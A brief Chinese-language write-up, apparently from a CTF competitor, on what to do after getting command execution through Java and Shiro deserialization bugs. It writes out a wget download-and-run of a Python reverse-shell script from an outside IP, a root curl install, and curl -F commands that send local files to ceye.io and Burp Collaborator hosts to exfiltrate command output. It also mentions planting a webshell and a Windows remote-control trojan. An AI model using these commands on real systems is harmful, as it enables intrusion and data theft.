我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。
先wget下载
wget http://123.123.123.123/shell.py -O /tmp/shell.py
然后再执行
python /tmp/shell.py
这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些。。。
Windows的直接下载远控马再执行。
但是之前比赛又一次遇到一个shiro反序列化
可以命令执行wget命令,但是反弹shell始终不行,即使有连接,但是没有启起来终端sh。
发现curl命令也没有,于是就安装一个
yum -y instal curl
运气也是好,后来发现是root权限。
安装后可以正常curl到外边。
但到这里我就卡住了,只能命令执行,而且没有回显。
于是想起了curl可以使用-F 参数(具体的百度)来post本地文件,那么我只要执行命令重定向到一个文本中,然后再curl外带出来,就可以看到执行结果。
`curl -F shl=@/KEY.txt 76ihvf.ceye.io`
利用burp的dnslog
curl -X POST -F xx=@index.php http://8clb1g723ior2vyd7sbyvcx6vx1ppe.burpcollaborator.net
这样做虽然的确很麻烦,但是至少我能看到回显内容,然后来判断当前路径和权限,接着就可以找到网站根目录来wget下载webshell。